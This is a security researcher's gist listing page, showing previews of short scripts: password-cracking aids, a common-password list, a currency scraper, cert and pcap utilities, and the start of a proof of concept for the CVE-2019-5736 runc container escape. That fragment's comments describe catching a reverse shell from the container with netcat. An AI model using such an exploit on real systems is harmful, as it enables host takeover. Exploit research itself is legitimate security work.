A Windows Arabic Code Page (CP1256) hashcat charset file. Its use is described by hashcat here. The original blog post describing it can be found at NTHashes and Encodings.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 123456789:allowed | |
| linkedin:allowed | |
| 000000:allowed | |
| linked:allowed | |
| 1234567890:allowed | |
| 222222:allowed | |
| 555555:allowed | |
| pakistan:allowed | |
| chocolate:allowed | |
| Linkedin:allowed |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| UA="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15" | |
| url="https://www.xe.com/currencyconverter/convert/" | |
| amount="$1" | |
| fromcur="$2" | |
| tocur="$3" | |
| if [ "$fromcur" == "" ]; then #Use default currencies | |
| fromcur="ZAR" | |
| tocur="GBP" | |
| fi |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/python3 | |
| # Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief) | |
| # Target will need a python3 interpreter | |
| # Edit IP info below, on the host run a netcat to catch the reverse shell | |
| # Run this python file in the container | |
| # Then from the host: docker exec -i <container name> /tmp/evil | |
| import os | |
| import stat | |
| host='172.17.0.1' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Simple CA cert generator & leaf cert signer | |
| # By [email protected] | |
| # All rights reserved 2019 | |
| ca_prefix="ca" | |
| leaf_prefix="host" | |
| ca_validity="1825" #days | |
| leaf_validity="730" #days | |
| size=2048 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| FROM alpine:latest as builder | |
| LABEL maintainer="@singe at SensePost <[email protected]>" | |
| RUN apk update && apk --no-cache add \ | |
| build-base \ | |
| && rm -rf /var/cache/apk/* | |
| WORKDIR / | |
| COPY yellow.c canary32.c canary32.h / | |
| RUN gcc -o yellow yellow.c canary32.c |
Remember to unzip the .docx first, or use scan.sh.
Compile the yara rule for scan.sh to work
yarac canarytoken.yar canarytoken
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| one=$1 | |
| two=$2 | |
| if [[ $one == "" || $two == "" ]]; then | |
| echo Display commands to merge two packet captures to the same time | |
| echo $0 "<cap one> <cap two> <offset>" | |
| exit 1 | |
| fi | |
| offset=$3 | |
| if [[ ! $offset > 0 ]]; then |
Remember to compile with debug.
-
Trace command
sudo dtrace -c '<command>' -o out.stacks -n 'profile-997 /execname == "<command name>"/ { @[ustack(100)] = count(); }' > /dev/null -
Create Graph